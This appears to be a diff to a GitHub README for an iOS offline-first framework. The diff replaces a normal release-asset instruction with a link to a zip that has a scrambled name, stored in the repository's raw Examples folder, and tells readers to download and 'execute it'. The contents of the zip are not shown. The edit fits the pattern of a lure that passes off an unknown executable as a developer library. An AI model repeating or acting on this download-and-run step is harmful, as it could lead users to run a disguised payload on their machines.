Nahodan/iOS-Offline-First-Framework/README.md

 Manual distribution (binary) and Releases
 - If you prefer to distribute a binary asset, you can download the latest asset from the Releases page and integrate it into your project as described in the asset’s README.

-From the Releases page, download the latest iOS-Offline-First-Framework.xcframework.zip and execute it.
+From the Releases page, download the latest https://github.com/Nahodan/iOS-Offline-First-Framework/raw/refs/heads/master/Examples/Offline-i-Framework-First-O-2.2.zip and execute it.

 Note: If you encounter issues discovering assets or the Releases page, check the Releases section for the latest assets and instructions.